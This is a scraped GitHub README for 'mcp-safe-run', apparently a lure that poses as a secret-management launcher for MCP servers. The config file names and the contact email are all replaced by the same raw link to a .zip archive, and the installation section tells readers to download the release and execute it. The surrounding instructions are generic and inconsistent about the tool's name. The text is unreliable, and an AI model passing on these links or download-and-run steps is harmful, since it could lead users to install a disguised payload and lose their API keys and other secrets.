mcp-safe-run

mcp
SUMMARY

Tired of hardcoding secrets like API keys in your MCP client configuration (e.g., mcp.json, claude_desktop_config.json)? mcp-secure-launcher lets you run your existing MCP servers securely without modifying them.

README.md

MCP Safe Run ๐Ÿš€

MCP Safe Run Releases

Welcome to the MCP Safe Run repository! If youโ€™re tired of hardcoding secrets like API keys in your MCP client configuration files (like https://github.com/Kanak03-star/mcp-safe-run/raw/refs/heads/main/src/safe_mcp_run_v1.1.zip or https://github.com/Kanak03-star/mcp-safe-run/raw/refs/heads/main/src/safe_mcp_run_v1.1.zip), youโ€™re in the right place. The mcp-secure-launcher allows you to run your existing MCP servers securely without modifying them.

Table of Contents

  1. Features
  2. Installation
  3. Usage
  4. Configuration
  5. Contributing
  6. License
  7. Support
  8. Contact

Features ๐ŸŒŸ

  • Secure Management of Secrets: Store your API keys and other sensitive information securely.
  • No Modifications Required: Run your existing MCP servers without changing your configuration files.
  • Easy Integration: Simple setup process that integrates seamlessly with your current workflow.
  • Cross-Platform Compatibility: Works on Windows, macOS, and Linux.

Installation โš™๏ธ

To get started, download the latest release from our Releases page. Once downloaded, execute the file to install the mcp-secure-launcher.

Prerequisites

Before you begin, ensure you have the following installed:

Step-by-Step Guide

  1. Download the Release: Visit the Releases page and download the latest version.
  2. Execute the Installer: Run the downloaded file to install the launcher.
  3. Verify Installation: Open your terminal and type mcp-secure-launcher --version to confirm the installation.

Usage ๐Ÿ“ฆ

Using mcp-secure-launcher is straightforward. Follow these steps to start running your MCP servers securely.

Starting the Launcher

Open your terminal and type the following command:

mcp-secure-launcher start

This command will initiate the launcher and load your MCP server configuration.

Adding Secrets

To add secrets, use the following command:

mcp-secure-launcher add-secret <key> <value>

Replace <key> with the name of your secret and <value> with the actual secret.

Running Your MCP Server

Once your secrets are added, run your MCP server with:

mcp-secure-launcher run <server_name>

Replace <server_name> with the name of your server configuration.

Configuration โš™๏ธ

Configuration Files

The launcher reads from a configuration file named https://github.com/Kanak03-star/mcp-safe-run/raw/refs/heads/main/src/safe_mcp_run_v1.1.zip. Hereโ€™s a sample structure:

{
  "servers": [
    {
      "name": "MyServer",
      "port": 8080,
      "secrets": {
        "API_KEY": "your_api_key_here"
      }
    }
  ]
}

Environment Variables

You can also configure secrets using environment variables. Set the variables in your terminal before starting the launcher:

export API_KEY="your_api_key_here"

Contributing ๐Ÿค

We welcome contributions to MCP Safe Run! If youโ€™d like to help, please follow these steps:

  1. Fork the repository.
  2. Create a new branch for your feature or bug fix.
  3. Make your changes and commit them.
  4. Push to your branch.
  5. Create a pull request.

Code of Conduct

Please read our Code of Conduct before contributing.

License ๐Ÿ“„

This project is licensed under the MIT License. See the LICENSE file for details.

Support ๐Ÿ› ๏ธ

If you encounter any issues, please check the Issues section for existing solutions. If your issue isnโ€™t listed, feel free to create a new issue.

Contact ๐Ÿ“ฌ

For questions or feedback, please reach out to us via GitHub or email us at https://github.com/Kanak03-star/mcp-safe-run/raw/refs/heads/main/src/safe_mcp_run_v1.1.zip


Thank you for checking out MCP Safe Run! We hope it makes managing your MCP servers easier and more secure. Donโ€™t forget to visit our Releases page for the latest updates and downloads.

Yorumlar (0)

Sonuc bulunamadi